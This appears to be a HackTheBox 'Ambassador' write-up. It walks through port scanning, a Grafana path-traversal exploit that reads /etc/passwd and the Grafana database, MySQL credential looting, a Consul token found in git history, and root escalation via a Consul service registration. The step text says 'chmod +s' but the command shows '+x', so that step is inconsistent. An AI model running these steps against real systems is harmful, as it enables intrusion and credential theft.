HACKTHEBOX (HTB) WRITEUP: AMBASSADOR [MEDIUM]
5 min readOct 9, 2022
SCANNING
> TARGET=10.129.51.137 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmapPORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack ttl 63
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sun, 02 Oct 2022 20:26:47 GMT
| Content-Length: 29
| href="/login">Found</a>.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sun, 02 Oct 2022 20:26:02 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sun, 02 Oct 2022 20:26:10 GMT
|_ Content-Length: 0
3306/tcp open mysql syn-ack ttl 63 MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 9
| Capabilities flags: 65535
| Some Capabilities: DontAllowDatabaseTableColumn, FoundRows, ConnectWithDatabase, SupportsLoadDataLocal, Speaks41ProtocolOld, ODBCClient, IgnoreSpaceBeforeParenthesis, Support41Auth, IgnoreSigpipes, SwitchToSSLAfterHandshake, LongColumnFlag, SupportsCompression, LongPassword, SupportsTransactions, Speaks41ProtocolNew, InteractiveClient, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: \x07\x1Ao S#`HQUWw>\x138V']V%
|_ Auth Plugin Name: caching_sha2_password
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=MySQL_Server_8.0.28_Auto_Generated_Server_Certificate
| Issuer: commonName=MySQL_Server_8.0.28_Auto_Generated_CA_Certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-03-13T22:27:05
| Not valid after: 2032-03-10T22:27:05
| MD5: add1 0a46 7692 932b c703 ffea c49b 63b0
| SHA-1: da31 03a2 1f92 d0be b27b d285 b7d6 5a87 c25f e433
WEB ENUM: 80
Use the developer account to SSH, DevOps will give you the password.- dirsearch
> dirsearch -u http://10.129.51.137 -x 403,404,500
[16:39:53] 200 - 2KB - /404.html
[16:40:28] 301 - 319B - /categories -> http://10.129.51.137/categories/
[16:40:53] 301 - 315B - /images -> http://10.129.51.137/images/
[16:40:53] 200 - 994B - /images/
[16:40:54] 200 - 4KB - /index.html
[16:40:55] 200 - 1KB - /index.xml
[16:41:21] 301 - 314B - /posts -> http://10.129.51.137/posts/
[16:41:32] 200 - 645B - /sitemap.xml
[16:41:38] 301 - 313B - /tags -> http://10.129.51.137/tags/WEB ENUM: 3000
- Browse to http://10.129.51.137:3000/login, found
grafanaand versionv8.2.0 (d7f71e9eae) - Google on web and found this: https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/
- Using this exploit: https://www.exploit-db.com/exploits/50581
> python 50581.py -H http://10.129.51.137:3000
Read file > /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
grafana:x:113:118::/usr/share/grafana:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
consul:x:997:997::/home/consul:/bin/falseRead file > /etc/grafana/grafana.ini
# default admin password, can be changed before first start of grafana, or in profile settings
admin_password = m********************7
- Can login as
admin
GRAFANA
- Dump the database
> curl --path-as-is http://10.129.51.137:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db# in .table data_source, found the db info
user: grafana
db: grafana
password: d************************!
MYSQL
- Using the above credential, we can login to the mysql db
> mysql -h 10.129.51.137 -u grafana -p- Explore the db and locate the password for
developer
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| grafana |
| information_schema |
| mysql |
| performance_schema |
| sys |
| whackywidget |
+--------------------+MySQL [(none)]> use whackywidget
MySQL [whackywidget]> show tables;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users |
+------------------------+MySQL [whackywidget]> select * from users;
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | ********************ZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
- Decode to get the password:
a*************************8
> echo '********************ZXdZb3JrMDI3NDY4Cg==' | base64 -d- Login via ssh as developer and get the user flag
LOCAL ENUM
- Local enum found a folder owned by root with read access to developer and contains a .git repo
developer@ambassador:/opt/my-app$ ls -la
total 24
drwxrwxr-x 5 root root 4096 Mar 13 2022 .
drwxr-xr-x 4 root root 4096 Sep 1 22:13 ..
drwxrwxr-x 4 root root 4096 Mar 13 2022 env
drwxrwxr-x 8 root root 4096 Mar 14 2022 .git
-rw-rw-r-- 1 root root 1838 Mar 13 2022 .gitignore
drwxrwxr-x 3 root root 4096 Mar 13 2022 whackywidget- Showing the git history found a token and a command
git show
commit 33a53ef9a207976d5ceceddc41a199558843bf3c (HEAD -> main)
Author: Developer <developer@ambassador.local>
Date: Sun Mar 13 23:47:36 2022 +0000 tidy config scriptdiff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index 35c08f6..fc51ec0 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
# We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD before running
+# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
-consul kv put --token ********-****-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
PE: CONSUL API
- Search online found the following resources regarding exploiting
consul - https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/misc/consul_service_exec
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/consul_service_exec.rb
- Create a
e.shscript under tmp to hold our payload, in here, i add +s to/usr/bin/bash. Then use consul API to register a task to run as root
> echo 'chmod +x /usr/bin/bash' > /tmp/e.sh- Register a consul service to trigger the exploit
> curl --header "X-Consul-Token: ********-****-d62b-24b5-39540ee469b5" --request PUT -d '{"ID": "meow", "Name": "meow", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/e.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register- Prompt as effective root and get the root flag
> bash -p